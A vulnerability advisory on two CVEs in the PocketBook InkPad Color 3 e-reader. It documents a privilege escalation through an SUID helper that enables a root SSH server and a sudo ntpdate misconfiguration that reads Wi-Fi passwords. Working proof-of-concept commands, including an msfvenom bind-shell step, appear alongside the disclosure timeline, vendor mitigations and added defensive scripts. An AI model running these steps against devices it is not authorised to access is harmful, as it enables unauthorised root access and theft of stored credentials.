Security Advisory: Multiple Vulnerabilities in PocketBook InkPad Color 3 E-reader

Mar 4, 2025 by Benjamin Faller

Recently, I promised myself to read more. In the past however, I was always slightly annoyed at having to carry books around, and reading PDFs on a smartphone was not really a convenient option either. So I searched for an e-reader that could solve these problems. The device I chose was a Pocketbook InkPad Color 3. This e-reader has one crucial feature that stood out: it allows you to install custom applications such as KOReader. Since I believe that everyone should have full control over a device that they own, I wondered whether any jailbreaks exist that would allow me to escalate privileges. So, I began looking on the internet and it seemed that prior jailbreaks for similar devices were patched and I was apparently out of luck. Nevertheless, the device ticked all other boxes so I decided to order one anyway and take up the challenge myself.

After just a few days I found a privilege escalation vulnerability caused by an unintended use of an SUID binary to enable the developer mode, as well as a second vulnerability allowing users to read file content from the device. The following write-up explains the process as well as the identified vulnerabilities on a technical level and proposes possible fixes and mitigations.

For both vulnerabilities a coordinated vulnerability disclosure was initiated with the vendor PocketBook. Unfortunately, despite a quite positive initial communication with the vendor, both vulnerabilities remain unpatched at the time of the advisory publication (2025-03-04).

Overview of Findings

The following security vulnerabilities have been identified:

  • CVE-2025-1424 Privilege Escalation Through SUID Binary and Developer Mode
  • CVE-2025-1425 File Read Through Improper Sudo Privilege Management

Preface: Getting a Shell

The first goal was to get an interactive shell on the device itself. Since the most common threat model for this device is an attacker having physical access to the device, there are numerous paths to achieve this. However, since I did not want to instantly break the device, I initially focused on non-intrusive options. That left me with USB or network communication such as Wi-Fi and Bluetooth as the remaining options.

Since we already know that custom applications can be installed, I looked into how this was implemented. As it turns out, an executable file ending in .app, copied via the provided USB file transfer into the applications directory, is listed in the e-reader menu and can be executed. The following screenshot depicts how the device shows up after the e-reader is connected via USB and the PC LINK option was selected:

The same applications can then be found in the e-reader’s menu in the «user» section:


This means we can connect the PocketBook to the same Wi-Fi network, generate a classic bind shell for the ARM architecture using msfvenom and copy it using the PC LINK feature:

$ msfvenom -p linux/armle/shell_bind_tcp LPORT=1337 -f elf -o bind.app

After running the bind shell on the e-reader, we can connect to it and start issuing our own commands. With the id command we verify that we popped a shell and have limited privileges:

uid=101(reader) gid=101(reader) groups=3003

CVE-2025-1424: Privilege Escalation Through SUID Binary and Developer Mode

A privilege escalation on the PocketBook InkPad Color 3 allows attackers to escalate to root privileges if they gain physical access to the device.

CVSS v4.0 Score: 8.6 (HIGH)

Vulnerability Analysis

The device features multiple initialization scripts executed in certain cases. One such script contains the USB initialization, which is responsible for providing the mass storage when the PC LINK feature is active. This script is listed below:

$ cat /etc/init.d/usb
#!/bin/sh
. /ebrmain/config/device.cfg
# initialize usb gadget as empty mass storage
GDIR=/config/usb_gadget/g1
mkdir -p $GDIR
echo 0x1d6b >$GDIR/idVendor
echo 0x0104 >$GDIR/idProduct
echo 0x0100 >$GDIR/bcdDevice
echo 0x0200 >$GDIR/bcdUSB
mkdir $GDIR/strings/0x409
echo Obreey >$GDIR/strings/0x409/manufacturer
echo ${usb_product_name:-Pocketbook} > $GDIR/strings/0x409/product
echo 0xEF >$GDIR/bDeviceClass
echo 0x02 >$GDIR/bDeviceSubClass
echo 0x01 >$GDIR/bDeviceProtocol
echo 1       >$GDIR/os_desc/use
echo 0xcd    >$GDIR/os_desc/b_vendor_code
echo MSFT100 >$GDIR/os_desc/qw_sign
mkdir $GDIR/configs/c.1
echo 500 >$GDIR/configs/c.1/MaxPower

# initialize usb gadget as ncm interface
mkdir $GDIR/functions/rndis.0
echo RNDIS >$GDIR/functions/rndis.0/os_desc/interface.rndis/compatible_id
echo 5162001 >$GDIR/functions/rndis.0/os_desc/interface.rndis/sub_compatible_id
ln -s $GDIR/functions/rndis.0 $GDIR/configs/c.1
ln -s $GDIR/configs/c.1 $GDIR/os_desc/c.1

mkdir $GDIR/functions/mass_storage.0
ln -s $GDIR/functions/mass_storage.0 $GDIR/configs/c.1

# activate usb gadget
ls /sys/class/udc >$GDIR/UDC

if [ -f /mnt/secure/developer_mode ] ; then
        NET=192.168.205
        UDHCONF=/var/run/udhcpd.conf
        usleep 250000
        ifconfig usb0 up $NET.1
        echo "start $NET.2" >$UDHCONF
        echo "end $NET.254" >>$UDHCONF
        echo "interface usb0" >>$UDHCONF
        echo "opt subnet 255.255.255.0" >>$UDHCONF
        /sbin/udhcpd $UDHCONF
        /sbin/dropbear -G $NET
fi

The last lines check whether the file /mnt/secure/developer_mode exists. If it is present, the script configures USB tethering over RNDIS and starts a Dropbear SSH server, so a root shell is automatically offered over the USB network. However, the /mnt/secure directory permissions do not allow the user reader to create new files; the path is only writable by the user sreader.

However, numerous SUID binaries are present which run under the sreader user account:

$ ls -la /ebrmain/cramfs/bin | grep sr
-rwsr-sr-x    1 sreader  sreader     162488 Jun  7 10:45 Dictionary.app
-rwsr-sr-x    1 sreader  sreader      38760 Jun  7 10:45 acsm_fulfill.app
-rwsr-sr-x    1 sreader  sreader      22256 Jun  7 10:45 adobe_activation.app
-rwsr-sr-x    1 sreader  sreader     118404 Jun  7 10:45 adobescanner.app
-rwsr-sr-x    1 sreader  sreader    2819680 Jun  7 10:45 bookstore-2.app
-rwsr-sr-x    1 sreader  sreader      42920 Jun  7 10:45 bookstore.app
-rwsr-sr-x    1 sreader  sreader      30796 Jun  7 10:45 checkupdate
-rwsr-sr-x    1 root     root        265140 Jun  7 10:45 checkupdate-2
-rwsr-sr-x    1 sreader  sreader     425080 Jun  7 10:45 control_panel_mgr.app
-rwsr-sr-x    1 sreader  sreader      26552 Jun  7 10:45 dictpackageinstaller.app
-rwsr-sr-x    1 sreader  sreader     231760 Jun  7 10:45 download_device_parameters.app
-rwsr-sr-x    1 sreader  sreader     117096 Jun  7 10:45 eink-cache-reader.app
-rwsr-sr-x    1 sreader  sreader    2049756 Jun  7 10:45 eink-reader.app
-rwsr-sr-x    1 sreader  sreader    1445884 Jun  7 10:45 empik_store.app
-rwsr-sr-x    1 sreader  sreader      13940 Jun  7 10:45 epub_optimizer.app
-rwsr-sr-x    1 sreader  sreader    1238580 Jun  7 10:45 explorer-3
-rwsr-sr-x    1 sreader  sreader     248516 Jun  7 10:45 gesture_settings
-rwsr-sr-x    1 sreader  sreader      47168 Jun  7 10:45 input_dialog.app
-rwsr-sr-x    1 sreader  sreader      14204 Jun  7 10:45 iv2sh
-rwsr-sr-x    1 sreader  sreader     174320 Jun  7 10:45 legal_checker
-rwsr-sr-x    1 sreader  sreader     182516 Jun  7 10:45 legal_update
-rwsr-sr-x    1 sreader  sreader     396628 Jun  7 10:45 legalui.app
-rwsr-sr-x    1 sreader  sreader      18176 Jun  7 10:45 legimi_downloader
-rwsr-sr-x    1 sreader  sreader       9916 Jun  7 10:45 legimi_synchronizer
-rwsr-sr-x    1 sreader  sreader     277648 Jun  7 10:45 legimi_viewer.app
-rwsr-sr-x    1 sreader  sreader      44020 Jun  7 10:45 libronet_switcher.app
-rwsr-sr-x    1 root     root        306700 Jun  7 10:45 netagent
-rwsr-sr-x    1 root     root          5644 Jun  7 10:45 new_task.app
-rwsr-sr-x    1 sreader  sreader       9764 Jun  7 10:45 ntpdate.app
-rwsr-sr-x    1 sreader  sreader       9808 Jun  7 10:45 pbcloud_auth.app
-rwsr-sr-x    1 sreader  sreader       9820 Jun  7 10:45 return_loan.app
-rwsr-sr-x    1 sreader  sreader       9792 Jun  7 10:45 s2pb_wizard.app
-rwsr-sr-x    1 sreader  sreader    2246100 Jun  7 10:45 settings.app
-rwsr-sr-x    1 sreader  sreader     424448 Jun  7 10:45 setup_wizard.app
-rwsr-sr-x    1 sreader  sreader       9804 Jun  7 10:45 store-native-auth.app
-rwsr-sr-x    1 root     root        137980 Jun  7 10:45 sudo
-rwsr-sr-x    1 sreader  sreader     409184 Jun  7 10:45 sysinstall.app
-rwsr-sr-x    1 sreader  sreader      51292 Jun  7 10:45 tts_package_info_updater.app
-rwsr-sr-x    1 sreader  sreader     117196 Jun  7 10:45 tts_package_installer.app
-rwsr-sr-x    1 sreader  sreader     273404 Jun  7 10:45 tts_package_manager.app

Since the /mnt/secure directory is owned by sreader, a vulnerability in one of those SUID binaries allows us to create a file in this directory. The binary iv2sh exposes multiple functions that run with sreader privileges:

$ /usr/cramfs/bin/iv2sh xzy
do main_internal(/usr/cramfs/bin/iv2sh,xzy)
called iv2sh
do main_internal(xzy)
called xzy
unknown xzy
Available functions:
SendEventTo(task,type,par1,par2)
WriteConfig(cfg,param,value)
SetFrontlightState(flstate)
GetCustomizedPartner()
GetCustomizedPartnerName()
NetConnect((name))
SetActiveTask(task,subtask)
FindTaskByAppName(appname)
ReadConfig(cfg,param,default_value)
FastBookHash(filename)
WriteStartupLogo(filename)
WriteLowPowerLogo(filename)
QueryNetwork()
EnumDictionaries()
FindTaskByBook(book name)
GetResource(recource_name,file_name)
SetGSensorEnabled(0/1)
reboot()
StartSoftwareUpdate()
CloseTask(task (pid or name))
hw_change_logo_by_lang(1 - boot, 2 - low power)
Return 0

This includes the ability to create or parse configuration files:

$ sh -c '/usr/cramfs/bin/iv2sh WriteConfig /tmp/testtest redguard 1'
$ ls -la /tmp/testtest*
-rw-rw-rw-    1 sreader  sreader         22 Sep 13 20:32 /tmp/testtest
-rw-rw-rw-    1 sreader  sreader         22 Sep 13 20:32 /tmp/testtest.back
$ cat /tmp/testtest
redguard=1


As a result, the iv2sh executable can be used to create the /mnt/secure/developer_mode file, enabling the developer mode of the e-reader.

Preconditions

To exploit this vulnerability, attackers need to execute code on the device such as manually starting an application in the applications folder. This requires physical access to the device in order to copy an exploit onto the device.

Proof-of-Concept

As a proof-of-concept, the following command, issued in a shell on the device, creates the corresponding file:

$ sh -c '/usr/cramfs/bin/iv2sh WriteConfig /mnt/secure/developer_mode privesc 1'

Next, the device is restarted. A new USB network interface then appears on the connected host:

$ ip a 
[...]
8: usb0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 12:95:37:f8:1b:bb brd ff:ff:ff:ff:ff:ff
    inet 192.168.205.2/24 brd 192.168.205.255 scope global dynamic noprefixroute usb0
       valid_lft 863603sec preferred_lft 863603sec
    inet6 fe80::1095:37ff:fef8:1bbb/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

This allows connecting directly to the SSH server as the root user:

$ ssh -o HostKeyAlgorithms=ssh-rsa root@192.168.205.1 -v

Suggested Mitigations and Countermeasures

In order to mitigate this vulnerability, the following countermeasures should be considered by the vendor:

  1. The functionality to write files as the user sreader should be removed from the affected SUID binary.
  2. Verify the file permissions of the /mnt/secure/developer_mode file before enabling developer mode. For example, it could be verified whether the file owner is root.
  3. The SUID binary attack surface should be reduced and thoroughly audited.
  4. Rework the permissions for the user sreader to prevent mix-up with root privileges.
  5. Allow users to set a device unlock password which has to be entered on boot.
  6. Although difficult to implement on a device with limited resources, full disk encryption could be considered.
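As an added example (not the vendor's code), the following is a stricter version of the developer-mode gate from /etc/init.d/usb implementing countermeasure 2: the flag file is only honoured if it is a regular file, owned by root and not writable by group or others, so a file created through the sreader-owned SUID helper is rejected. The optional second argument (expected uid) and the reliance on stat -c with %u and %A are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not PocketBook's code: a stricter developer-mode gate that
# could replace "if [ -f /mnt/secure/developer_mode ]" in /etc/init.d/usb.
# The flag must be a regular file (not a symlink), owned by the expected uid
# (root, uid 0, unless a second argument overrides it) and not writable by
# group or others, so a file written through the sreader-owned SUID helper
# no longer switches the SSH server on. Assumes a stat(1) that accepts -c
# with %u and %A (GNU coreutils and busybox both do).

developer_mode_allowed() {
    flag="$1"
    want_uid="${2:-0}"

    # A missing file or a symlink (even one pointing at a root-owned file) fails.
    [ -f "$flag" ] || return 1
    if [ -L "$flag" ]; then return 1; fi

    # %u = numeric owner uid, %A = symbolic mode such as -rw-r--r--
    owner=$(stat -c '%u' "$flag" 2>/dev/null) || return 1
    perm=$(stat -c '%A' "$flag" 2>/dev/null) || return 1

    [ "$owner" = "$want_uid" ] || return 1

    # In the symbolic mode, character 6 is the group write bit and
    # character 9 the world write bit; either one set means reject.
    case "$perm" in
        ?????w*|????????w*) return 1 ;;
    esac
    return 0
}

# Drop-in replacement for the original check in /etc/init.d/usb:
#   if developer_mode_allowed /mnt/secure/developer_mode ; then
#       ... bring up usb0, udhcpd and dropbear as before ...
#   fi
```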

CVE-2025-1425: File Read Through Improper Sudo Privilege Management

A sudo privilege misconfiguration allows attackers to read file contents on the PocketBook InkPad Color 3. This vulnerability arises through a /etc/sudoers misconfiguration that allows any user to execute the ntpdate command with root privileges.

CVSS v4.0 Score: 4.7 (MEDIUM)

Vulnerability Analysis

Attackers with access to the device can open an interactive shell and read all files on the device. This is due to a misconfiguration in the sudo configuration on the e-reader.

Issuing the command sudo -l shows that the user reader is allowed to run multiple commands as root:

User reader may run the following commands on this host:
    (ALL) NOPASSWD: /ebrmain/bin/sshstart.sh, (ALL) /ebrmain/bin/proftpd, (ALL)
    /ebrmain/bin/ip-over-usb-start.sh, (ALL) /sbin/ifconfig, (ALL)
    /ebrmain/bin/ntpdate

The scripts in /ebrmain/bin no longer exist on the device and the folder’s permissions don’t allow us to create new files. However, for ntpdate a GTFOBins entry exists, which allows us to read a file’s content. It should however be noted that the output of ntpdate does not necessarily print all of a file’s content. Depending on the content, only partial information will be shown.

Preconditions

To exploit this vulnerability attackers require a shell on the device. This typically requires physical access to the device in order to upload a shell which is then executed. While a network connection over Wi-Fi is not necessarily required, it makes exploitation easier and interactive.

Proof-of-Concept

For exploitation, the example listed in the GTFOBins entry can be used. The following commands read the contents of the /mnt/secure/network.conf file:

$ LFILE=/mnt/secure/network.conf
$ sudo /ebrmain/bin/ntpdate -a x -k $LFILE -d localhost

This results in the following output showing the Wi-Fi configuration including the PSK secrets:

 8 Nov 15:13:20 ntpdate[1849]: ntpdate 4.2.6p2@1.2194 Tue Apr 10 09:43:26 UTC 2012 (1)
Looking for host localhost and service ntp
host found : localhost
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key ctrl_interface=/var/run/wpa_supplicant/
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key update_config=1
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key network={
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key ssid="[...]"
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key psk=[...]
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key key_mgmt=WPA-PSK
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key id_str=""
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key }
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key network={
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key ssid="[...]"
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key psk=[...]
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key key_mgmt=WPA-PSK
 8 Nov 15:13:20 ntpdate[1849]: authreadkeys: cannot change key id_str=""
[...]
 8 Nov 15:13:20 ntpdate[1849]: authentication key 0 unknown

Suggested Mitigations and Countermeasures

In order to mitigate this vulnerability, the following countermeasures should be considered by the vendor:

  1. Remove the ntpdate utility from the /etc/sudoers configuration file. It is also recommended to remove any entry not strictly necessary.
  2. Allow users to set a device unlock password which has to be entered on boot.
  3. Although difficult to implement on a device with limited resources, full disk encryption could be considered.
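To support countermeasure 1, the following added example (not from the advisory or the vendor) audits a sudo -l listing in the wrapped format shown above against a filesystem root such as a mounted firmware image: every command entry is reported as present or missing on disk and as password or nopasswd, which surfaces both the dangling /ebrmain/bin entries and the remaining ntpdate rule in one pass. The embedded listing is a constructed copy of the one above; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the advisory or PocketBook: audit the command list
# that "sudo -l" prints for a user against a filesystem root (for example a
# mounted firmware image). Every entry is reported as present or missing on
# disk and as password or nopasswd, which surfaces dangling entries like the
# removed /ebrmain/bin scripts and the remaining ntpdate rule in one pass.
# The embedded listing is a constructed copy of the one shown above.

sample_listing() {
    cat <<'EOF'
User reader may run the following commands on this host:
    (ALL) NOPASSWD: /ebrmain/bin/sshstart.sh, (ALL) /ebrmain/bin/proftpd, (ALL)
    /ebrmain/bin/ip-over-usb-start.sh, (ALL) /sbin/ifconfig, (ALL)
    /ebrmain/bin/ntpdate
EOF
}

# audit_sudo_list ROOT   (reads the sudo -l listing on stdin)
# Output: one line per entry, "<present|missing> <password|nopasswd> <path>".
audit_sudo_list() {
    root="${1:-}"   # "" means the live filesystem; a prefix checks an extracted image
    # Keep only the lines after the header, undo the line wrapping, then split
    # on the commas that separate the individual command entries.
    { awk '/may run the following commands/ { on = 1; next } on' |
        tr '\n' ' '; echo; } | tr ',' '\n' |
    while IFS= read -r entry; do
        # Drop the "(ALL)" run-as specification and surrounding blanks.
        cmd=$(printf '%s\n' "$entry" | sed 's/^ *([^)]*) *//; s/ *$//')
        tag=password
        case "$cmd" in
            '') continue ;;
            NOPASSWD:*) tag=nopasswd
                        cmd=$(printf '%s\n' "$cmd" | sed 's/^NOPASSWD: *//') ;;
        esac
        if [ -e "$root$cmd" ]; then state=present; else state=missing; fi
        printf '%s %s %s\n' "$state" "$tag" "$cmd"
    done
}

# Usage: pipe a real "sudo -l" output or the sample through the auditor.
sample_listing | audit_sudo_list "${1:-}"
```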

Credits

  • Benjamin Faller, Redguard AG

After I identified the vulnerabilities I noticed that Synacktiv had done great prior research on an older Pocketbook device. Synacktiv’s blog post is certainly worth reading since besides their privilege escalation they expand on other features such as the cryptographic secrets management.

Timeline

  • 2024-11-12: Asked vendor via support form for a security contact to send the vulnerability details to.
  • 2024-11-13: Received initial response from PocketBook support.
  • 2024-11-13: Submitted preliminary vulnerability details to NCSC via web form.
  • 2024-11-14: Submitted preliminary vulnerability details to PocketBook after deciding on a means of transfer.
  • 2024-11-15: PocketBook forwarded the information to the responsible department.
  • 2024-12-16: Asked vendor for updates regarding a possible patch.
  • 2024-12-17: Vendor answered that the details were passed on and will inform once they have information to share.
  • 2025-01-10: Reminded vendor of disclosure timeline and asked when and if further information can be expected. The vendor then unexpectedly asked us to refrain from contacting them further and indicated that they are unable to answer our questions.
  • 2025-02-17: Contacted NCSC to reserve CVE-IDs and asked for further information on how to proceed with the vendor.
  • 2025-02-18: NCSC reserved the CVE numbers and Redguard redefined the publication date of the coordinated vulnerability disclosure to be 2025-03-04 should the vendor not explicitly request an extension before this point.
  • 2025-03-04: Publication of this advisory.

About Redguard

Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organizational security audits and consulting. This enables us to have a team with extensive experience in a wide variety of security relevant topics.

Disclaimer

This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible, and indeed likely, that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing, based on currently available information.

Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
